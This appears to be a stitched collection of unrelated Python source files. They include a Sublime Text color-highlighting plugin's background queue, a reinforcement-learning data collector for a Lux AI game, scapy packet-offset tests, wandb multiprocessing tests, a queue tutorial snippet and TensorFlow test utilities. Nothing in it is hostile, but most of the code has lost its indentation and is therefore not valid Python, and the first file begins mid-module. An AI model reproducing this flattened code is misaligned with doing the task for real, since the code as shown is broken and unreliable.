QUEUE = {} # views waiting to be processed by Color Highlight
# For snappier color highlighting, different delays are used for different color highlighting times:
# (color_highlighting_time, (delay, delay_when_busy))
DELAYS = (
(50, (50, 100)),
(100, (100, 300)),
(200, (200, 500)),
(400, (400, 1000)),
(600, (600, 1500)),
(800, (800, 2000)),
(1200, (1200, 1000)),
(1600, (1600, 3000)),
)
def get_delay(t, view):
delays = 0
for _t, d in DELAYS:
if _t <= t:
delays = d
else:
break
delays = delays or DELAYS[0][1]
# If the user specifies a delay greater than the built in delay,
# figure they only want to see marks when idle.
min_delay = int(settings.get('delay', 0) * 1000)
return (min_delay, min_delay) if min_delay > delays[1] else delays
def _update_view(view, filename, **kwargs):
# It is possible that by the time the queue is run,
# the original file is no longer being displayed in the view,
# or the view may be gone. This happens especially when
# viewing files temporarily by single-clicking on a filename
# in the sidebar or when selecting a file through the choose file palette.
valid_view = False
view_id = view.id()
if view.is_loading():
return
if (view.file_name() or '').encode('utf-8') != filename:
return
for window in sublime.windows():
for v in window.views():
if v.id() == view_id:
valid_view = True
break
if not valid_view:
return
highlight_colors(view, **kwargs)
def queue_highlight_colors(view, delay=-1, preemptive=False, **kwargs):
    '''Put the current view in a queue to be examined by Color Highlight'''
if preemptive:
delay = delay_when_busy = 0
elif delay == -1:
delay, delay_when_busy = get_delay(TIMES.get(view.id(), 100), view)
else:
delay_when_busy = delay
kwargs.update({
'delay': delay,
'delay_when_busy': delay_when_busy,
'preemptive': preemptive,
})
queue(view, partial(_update_view, view, (view.file_name() or '').encode('utf-8'), **kwargs), kwargs)
def _callback(view, filename, kwargs):
kwargs['callback'](view, filename, **kwargs)
def background_custom_highlighter():
__lock_.acquire()
try:
callbacks = list(QUEUE.values())
QUEUE.clear()
finally:
__lock_.release()
for callback in callbacks:
sublime.set_timeout(callback, 0)
################################################################################
# Queue dispatcher system:
queue_dispatcher = background_custom_highlighter
queue_thread_name = 'background custom highlighter'
MAX_DELAY = 10
def queue_loop():
    '''An infinite loop that runs the color highlighting in a background thread. It is
    meant to update the view once the user has modified it and then made no further
    modifications for some time, so as not to slow down the UI with color highlighting.'''
global __signaled_, __signaled_first_
while __loop_:
# print('acquire...')
__semaphore_.acquire()
__signaled_first_ = 0
__signaled_ = 0
# print('DISPATCHING!', len(QUEUE))
queue_dispatcher()
def queue(view, callback, kwargs):
global __signaled_, __signaled_first_
now = time.time()
__lock_.acquire()
try:
QUEUE[view.id()] = callback
delay = kwargs['delay']
if now < __signaled_ + delay * 4:
delay = kwargs['delay_when_busy']
__signaled_ = now
_delay_queue(delay, kwargs['preemptive'])
# print('%s queued in %s' % ('' if __signaled_first_ else 'first ', __signaled_ - now))
if not __signaled_first_:
__signaled_first_ = __signaled_
finally:
__lock_.release()
def _delay_queue(delay, preemptive):
global __signaled_, __queued_
now = time.time()
if not preemptive and now <= __queued_ + 0.01:
return # never delay queues too fast (except preemptively)
__queued_ = now
_delay = float(delay) / 1000
if __signaled_first_:
if MAX_DELAY > 0 and now - __signaled_first_ + _delay > MAX_DELAY:
_delay -= now - __signaled_first_
if _delay < 0:
_delay = 0
delay = int(round(_delay * 1000, 0))
new__signaled_ = now + _delay - 0.01
if __signaled_ >= now - 0.01 and (preemptive or new__signaled_ >= __signaled_ - 0.01):
__signaled_ = new__signaled_
# print('delayed to %s' % (preemptive, __signaled_ - now))
def _signal():
if time.time() < __signaled_:
return
__semaphore_.release()
sublime.set_timeout(_signal, delay)
def delay_queue(delay):
__lock_.acquire()
try:
_delay_queue(delay, False)
finally:
__lock_.release()
# only start the thread once - otherwise the plugin will get laggy
# when saving it often.
__semaphore_ = threading.Semaphore(0)
__lock_ = threading.Lock()
__queued_ = 0
__signaled_ = 0
__signaled_first_ = 0
# First, finalize any outstanding threads left over from a previous load:
__loop_ = False
__pre_initialized_ = False
def queue_finalize(timeout=None):
global __pre_initialized_
for thread in threading.enumerate():
        if thread.is_alive() and thread.name == queue_thread_name:
__pre_initialized_ = True
thread.__semaphore_.release()
thread.join(timeout)
queue_finalize()
# Initialize background thread:
__loop_ = True
__active_custom_highlighter_thread = threading.Thread(target=queue_loop, name=queue_thread_name)
__active_custom_highlighter_thread.__semaphore_ = __semaphore_
__active_custom_highlighter_thread.start()
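# The queue/dispatch machinery above is essentially a debounce: work is queued per
# view and only dispatched once the user has been idle for a delay. Below is a
# minimal, self-contained sketch of that idea using only the standard library
# (threading.Timer stands in for sublime.set_timeout); the SimpleDebouncer name and
# the callback it fires are illustrative and not part of this plugin.
import threading

class SimpleDebouncer(object):
    def __init__(self, delay, callback):
        self._delay = delay          # seconds of idle time before firing
        self._callback = callback
        self._lock = threading.Lock()
        self._timer = None

    def poke(self, *args, **kwargs):
        """Call on every event; only the last call within `delay` seconds wins."""
        with self._lock:
            if self._timer is not None:
                self._timer.cancel()  # supersede the previously scheduled run
            self._timer = threading.Timer(self._delay, self._callback, args, kwargs)
            self._timer.daemon = True
            self._timer.start()

# e.g. debouncer = SimpleDebouncer(0.3, rehighlight); call debouncer.poke() on every
# modification event, and rehighlight() runs only after 0.3 s without further pokes.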
################################################################################
# Initialize settings and main objects only once
class CustomHighlighterSettings(Settings):
def on_update(self):
window = sublime.active_window()
view = window.active_view()
view.run_command('custom_highlighter', dict(action='reset'))
settings = CustomHighlighterSettings(NAME)
class CustomHighlighterSettingCommand(SettingTogglerCommandMixin, sublime_plugin.WindowCommand):
settings = settings
if 'colorizer' not in globals():
colorizer = SchemaColorizer()
################################################################################
def plugin_loaded():
settings.load()
|
collector.py
|
def collect(config_out, input_data_out, data_path_out, collector_n_out, global_var_actor_out=None,
steps=10):
import abc
import time
from multiprocessing import Process
import tensorflow as tf
import gym
# import reverb
# import ray
import lux_gym.agents.agents as agents
from lux_ai import tools, tfrecords_storage
from lux_gym.envs.lux.action_vectors_new import empty_worker_action_vectors
physical_devices = tf.config.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# REWARD_CAP = 2000000
class Agent(abc.ABC):
def __init__(self, config, data):
# buffer_table_names, buffer_server_port,
# ray_queue=None, collector_id=None, workers_info=None, num_collectors=None
# ):
"""
Args:
config: A configuration dictionary
                data: the neural net weights
# buffer_table_names: dm reverb server table names
# buffer_server_port: a port where a dm reverb server was initialized
# ray_queue: a ray interprocess queue to store neural net weights
# collector_id: to identify a current collector if there are several ones
# workers_info: a ray interprocess (remote) object to store shared information
# num_collectors: a total amount of collectors
"""
self._env_name = config["environment"]
self._n_points = config["n_points"]
self._model_name = config["model_name"]
if data is None:
print("Collecting from a random agent.")
self._agent = agents.get_processing_agent(self._model_name, data)
self._feature_maps_shape = tools.get_feature_maps_shape(config["environment"])
self._actions_shape = [item.shape for item in empty_worker_action_vectors]
# self._table_names = buffer_table_names
# self._client = reverb.Client(f'localhost:{buffer_server_port}')
# self._ray_queue = ray_queue
# self._collector_id = collector_id
# self._workers_info = workers_info
# self._num_collectors = num_collectors
self._only_wins = config["only_wins"]
self._is_for_rl = config["is_for_rl"]
self._is_pg_rl = config["is_pg_rl"]
def _collect(self, agent):
"""
            Collects trajectories from an episode. An episode consists of n_points.
            One n_point contains (action, action_probs, action_mask, observation,
            total reward, temporal_mask, progress);
            the action is the response to the current observation,
            and reward and done refer to the current observation.
"""
player1_data = {}
player2_data = {}
environment = gym.make(self._env_name)
observations = environment.reset()
configuration = environment.configuration
game_states = environment.game_states
actions_1, actions_1_dict, actions_1_probs, proc_obs1, reward1 = agent(observations[0],
configuration, game_states[0])
actions_2, actions_2_dict, actions_2_probs, proc_obs2, reward2 = agent(observations[1],
configuration, game_states[1])
step = 0
player1_data = tools.add_point(player1_data, actions_1_dict, actions_1_probs, proc_obs1, step)
player2_data = tools.add_point(player2_data, actions_2_dict, actions_2_probs, proc_obs2, step)
# for step in range(1, configuration.episodeSteps):
while True:
step += 1
player1_prev_alive_units = [item.id for item in game_states[0].player.units]
player2_prev_alive_units = [item.id for item in game_states[1].player.units]
dones, observations = environment.step((actions_1, actions_2))
game_states = environment.game_states
if any(dones):
player1_alive_units_ids = []
player1_died_on_last_step_units_ids = []
player1_alive_units = [item.id for item in game_states[0].player.units]
for unit in player1_prev_alive_units:
if unit in player1_alive_units:
player1_alive_units_ids.append(unit)
else:
player1_died_on_last_step_units_ids.append(unit)
player2_alive_units_ids = []
player2_died_on_last_step_units_ids = []
player2_alive_units = [item.id for item in game_states[1].player.units]
for unit in player2_prev_alive_units:
if unit in player2_alive_units:
player2_alive_units_ids.append(unit)
else:
player2_died_on_last_step_units_ids.append(unit)
break
actions_1, actions_1_dict, actions_1_probs, proc_obs1, reward1 = agent(observations[0],
configuration, game_states[0])
actions_2, actions_2_dict, actions_2_probs, proc_obs2, reward2 = agent(observations[1],
configuration, game_states[1])
player1_data = tools.add_point(player1_data, actions_1_dict, actions_1_probs, proc_obs1, step)
player2_data = tools.add_point(player2_data, actions_2_dict, actions_2_probs, proc_obs2, step)
reward1 = observations[0]["reward"]
reward2 = observations[1]["reward"]
unit_rewards = {}
if reward1 != reward2:
if reward1 > reward2: # 1 player won
win_data = player1_data
win_died_on_last_step_units_ids = player1_died_on_last_step_units_ids
# win_alive_units_ids = player1_alive_units_ids
lose_data = player2_data
lose_died_on_last_step_units_ids = player2_died_on_last_step_units_ids
lose_alive_units_ids = player2_alive_units_ids
else:
win_data = player2_data
win_died_on_last_step_units_ids = player2_died_on_last_step_units_ids
# win_alive_units_ids = player2_alive_units_ids
lose_data = player1_data
lose_died_on_last_step_units_ids = player1_died_on_last_step_units_ids
lose_alive_units_ids = player1_alive_units_ids
for unit_id in win_data.keys():
if unit_id in win_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-0.33, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(1, dtype=tf.float16)
for unit_id in lose_data.keys():
if unit_id in lose_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-1, dtype=tf.float16)
elif unit_id in lose_alive_units_ids:
unit_rewards[unit_id] = tf.constant(0.33, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(0, dtype=tf.float16)
else:
players_data = {**player1_data, **player2_data}
for unit_id in players_data.keys():
if unit_id in player1_died_on_last_step_units_ids + player2_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-1, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(0.33, dtype=tf.float16)
progress = tf.linspace(0., 1., step + 2)[:-1]
progress = tf.cast(progress, dtype=tf.float16)
# if reward1 > reward2:
# final_reward_1 = tf.constant(1, dtype=tf.float16)
# final_reward_2 = tf.constant(-1, dtype=tf.float16)
# elif reward1 < reward2:
# final_reward_2 = tf.constant(1, dtype=tf.float16)
# final_reward_1 = tf.constant(-1, dtype=tf.float16)
# else:
# final_reward_1 = final_reward_2 = tf.constant(0, dtype=tf.float16)
# final_reward_1 = reward1 / REWARD_CAP if reward1 != -1 else 0
# final_reward_1 = 2 * final_reward_1 - 1
# final_reward_2 = reward2 / REWARD_CAP if reward2 != -1 else 0
# final_reward_2 = 2 * final_reward_2 - 1
if self._only_wins:
if reward1 > reward2:
output = (player1_data, None), unit_rewards, progress
elif reward1 < reward2:
output = (None, player2_data), unit_rewards, progress
else:
output = (player1_data, player2_data), unit_rewards, progress
else:
output = (player1_data, player2_data), unit_rewards, progress
return output
def collect_once(self):
return self._collect(self._agent)
def collect_and_store(self, collect_n, data_path, collector_n):
(player1_data, player2_data), rewards, progress = self.collect_once()
tfrecords_storage.record(player1_data, player2_data, rewards,
self._feature_maps_shape, self._actions_shape, collect_n,
collect_n, progress,
is_for_rl=self._is_for_rl, save_path=data_path, collector_n=collector_n,
is_pg_rl=self._is_pg_rl)
def collect_and_store(iteration, conf, in_data, data_path, collector_n):
collect_agent = Agent(conf, in_data)
collect_agent.collect_and_store(iteration, data_path, collector_n)
# collect_and_store(0, config_out, input_data_out, data_path_out, collector_n_out)
for i in range(steps):
p = Process(target=collect_and_store, args=(i, config_out, input_data_out, data_path_out, collector_n_out))
p.start()
p.join()
# if global_var_actor_out is not None:
# ray.get(global_var_actor_out.set_done.remote(True))
print("Collecting is done.")
time.sleep(1)
|
scapy_isolated_test.py
|
#!/usr/bin/python
import sys, os
from multiprocessing import Process
import tempfile
from functools import wraps
def check_offsets(build, scapy_str):
import sys
# clean this env
for key in sys.modules.copy().keys():
if key.startswith('scapy.'):
del sys.modules[key]
globals().clear()
import outer_packages
from scapy.all import Ether, IP, UDP
pkt = eval(scapy_str)
if build:
pkt.build()
assert pkt
assert pkt.payload
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
if build:
                assert lay._offset != 0, 'Offset of second and further layers should not be zero if the packet is built.'
else:
                assert lay._offset == 0, 'Offset of second and further layers should be zero if the packet is not built.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
else:
if build:
if field.get_size_bytes() == 0:
continue
                    assert field._offset != 0, 'Offset of second and further fields should not be zero if the packet is built.'
else:
                    assert field._offset == 0, 'Offset of second and further fields should be zero if the packet is not built.'
lay = lay.payload
def check_offsets_pcap(pcap):
import sys
# clean this env
for key in sys.modules.copy().keys():
if key.startswith('scapy.'):
del sys.modules[key]
globals().clear()
import outer_packages
from scapy.all import Ether, IP, UDP
from scapy.layers.dns import DNS
from scapy.utils import rdpcap
pkt = rdpcap(pcap)[0]
assert pkt
assert pkt.payload
not_built_offsets = {}
cond_var_length = False
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
not_built_offsets[lay.name] = {}
not_built_offsets[lay.name]['_offset'] = lay._offset
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
assert lay._offset != 0, 'Offset of second and further layers should not be zero.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
if field.name == "length":
cond_var_length = True
else:
if field.get_size_bytes() == 0:
continue
if cond_var_length:
cond_var_length = False
continue
                assert field._offset != 0, 'Offset of second and further fields should not be zero if the packet is built.'
not_built_offsets[lay.name][field.name] = field._offset
lay = lay.payload
print('')
pkt.build()
cond_var_length = False
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
assert not_built_offsets[lay.name]['_offset'] == lay._offset, 'built and not built pcap offsets differ'
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
assert lay._offset != 0, 'Offset of second and further layers should not be zero.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
if field.name == "length":
cond_var_length = True
else:
if field.get_size_bytes() == 0:
continue
if cond_var_length:
cond_var_length = False
continue
                assert field._offset != 0, 'Offset of second and further fields should not be zero if the packet is built.'
assert not_built_offsets[lay.name][field.name] == field._offset, 'built and not built pcap offsets differ'
lay = lay.payload
def isolate_env(f):
@wraps(f)
def wrapped(*a):
print('')
p = Process(target = f, args = a)
p.start()
p.join()
if p.exitcode:
raise Exception('Return status not zero, check the output')
return wrapped
class CScapy_Test():
def setUp(self):
self.dir = os.path.abspath(os.path.dirname(__file__)) + '/'
# verify that built packet gives non-zero offsets
@isolate_env
def test_scapy_offsets_udp_build(self):
check_offsets(scapy_str = "Ether()/IP()/UDP()/('x'*9)", build = True)
# verify that non-built packet gives zero offsets
@isolate_env
def test_scapy_offsets_udp_nobuild(self):
check_offsets(scapy_str = "Ether()/IP()/UDP()/('x'*9)", build = False)
# verify that pcap either built or not gives same non-zero offsets
@isolate_env
def test_scapy_offsets_pcap(self):
check_offsets_pcap(pcap = self.dir + 'golden/bp_sim_dns_vlans.pcap')
@isolate_env
def test_scapy_ipfix(self):
from scapy.contrib.ipfix import IPFIX
p = IPFIX()
p.show2()
@isolate_env
def test_scapy_utils(self):
from scapy.all import str2int, int2str, str2ip
# str2int
assert str2int('0') == ord('0')
assert str2int(b'\x07') == 7
assert str2int(b'\xff') == 255
assert str2int(b'\x01\xff') == 511
assert str2int(5) == 5
assert str2int('be') == 25189 # ord(b) * 2^8 + ord(e)
assert str2int('') == 0
# int2str
assert int2str(98) == b'b'
assert int2str(255) == b'\xff'
assert int2str(50000, 2) == b'\xc3\x50'
assert int2str(25189) == "be".encode('utf-8')
assert int2str(0) == ''.encode('utf-8')
assert int2str(5, 3) == b'\x00\x00\x05'
# str2ip
assert str2ip(b'\xff\xff\xff\xff') == '255.255.255.255'
assert str2ip(b'\xc0\xa8\x00\x01') == '192.168.0.1'
|
test_mp_full.py
|
from __future__ import print_function
"""
multiproc full tests.
"""
import importlib
import multiprocessing
import platform
import pytest
import time
import wandb
from wandb.errors import UsageError
import sys
def train(add_val):
time.sleep(1)
wandb.log(dict(mystep=1, val=2 + add_val))
wandb.log(dict(mystep=2, val=8 + add_val))
wandb.log(dict(mystep=3, val=3 + add_val))
wandb.log(dict(val2=4 + add_val))
wandb.log(dict(val2=1 + add_val))
time.sleep(1)
def test_multiproc_default(live_mock_server, test_settings, parse_ctx):
run = wandb.init(settings=test_settings)
train(0)
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
@pytest.mark.skipif(platform.system() == "Windows", reason="fork needed")
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="flaky?")
def test_multiproc_ignore(live_mock_server, test_settings, parse_ctx):
run = wandb.init(settings=test_settings)
train(0)
procs = []
for i in range(2):
procs.append(multiprocessing.Process(target=train, kwargs=dict(add_val=100)))
try:
for p in procs:
p.start()
finally:
for p in procs:
p.join()
assert p.exitcode == 0
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
@pytest.mark.flaky
@pytest.mark.skipif(platform.system() == "Windows", reason="fork needed")
@pytest.mark.xfail(platform.system() == "Darwin", reason="console parse_ctx issues")
def test_multiproc_strict(live_mock_server, test_settings, parse_ctx):
test_settings.strict = "true"
run = wandb.init(settings=test_settings)
train(0)
procs = []
for i in range(2):
procs.append(multiprocessing.Process(target=train, kwargs=dict(add_val=100)))
try:
for p in procs:
p.start()
finally:
for p in procs:
p.join()
# expect fail
assert p.exitcode != 0
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
def test_multiproc_strict_bad(live_mock_server, test_settings, parse_ctx):
with pytest.raises(UsageError):
test_settings.strict = "bad"
@pytest.mark.skipif(
sys.version_info[0] < 3, reason="multiprocessing.get_context introduced in py3"
)
def test_multiproc_spawn(test_settings):
    # WB5640. Before the WB5640 fix this code fragment would raise an
    # exception; this test checks that it runs without error.
from .utils import test_mod
test_mod.main()
sys.modules["__main__"].__spec__ = importlib.machinery.ModuleSpec(
name="tests.utils.test_mod", loader=importlib.machinery.BuiltinImporter
)
test_mod.main()
sys.modules["__main__"].__spec__ = None
# run this to get credit for the diff
test_mod.mp_func()
|
queue.py
|
# Using queue.Queue
# • The queue.Queue data structure can be used to synchronize threads; for processes,
#   multiprocessing.JoinableQueue offers the same interface (see the process-based sketch below)
import threading
import queue
q = queue.Queue()
def worker():
while True:
item = q.get()
print(f"Item {item}.", end=" ")
q.task_done()
threading.Thread(target=worker, daemon=True).start()
for item in range(3):
q.put(item)
q.join()
print("All done!")
# Output: Item 0. Item 1. Item 2. All done!
# multiprocessing is used for heavy computations, and
# multithreading is used when you mostly wait, e.g. for a web page to load
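# Process-based counterpart (an illustrative sketch, not part of the original
# snippet): multiprocessing.JoinableQueue exposes the same put/get/task_done/join
# interface across process boundaries. Guarded so it only runs when this file is
# executed directly.
import multiprocessing

def proc_worker(jq):
    while True:
        item = jq.get()
        print(f"Item {item}.", end=" ")
        jq.task_done()

if __name__ == "__main__":
    jq = multiprocessing.JoinableQueue()
    multiprocessing.Process(target=proc_worker, args=(jq,), daemon=True).start()
    for item in range(3):
        jq.put(item)
    jq.join()
    print("All done!")
    # Output (analogous to the threaded version): Item 0. Item 1. Item 2. All done!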
|
test_util.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import re
import sys
import threading
import numpy as np
import six
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError(
"Expected op for node %s is different. %s vs %s" % (
node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError(
"Not all expected ops are present. Expected %s, found %s" % (
expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
    Creates another proto of the same type as message, parses the ascii form into
    it, and then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self, expected, actual, producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
    `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
            self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
        # protobuf's CopyFrom() returns None, so copy into a fresh proto explicitly
        new_config = config_pb2.ConfigProto()
        new_config.CopyFrom(config)
        new_config.allow_soft_placement = False
        config = new_config
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminated due to
          an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
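  # Illustrative (hypothetical) use of checkedThread inside a test method:
  #   t = self.checkedThread(target=self._my_worker, args=(arg,))
  #   t.start()
  #   t.join()  # reported as a test failure if self._my_worker raised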
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (
f1, f2, err, " (%s)" % msg if msg is not None else ""))
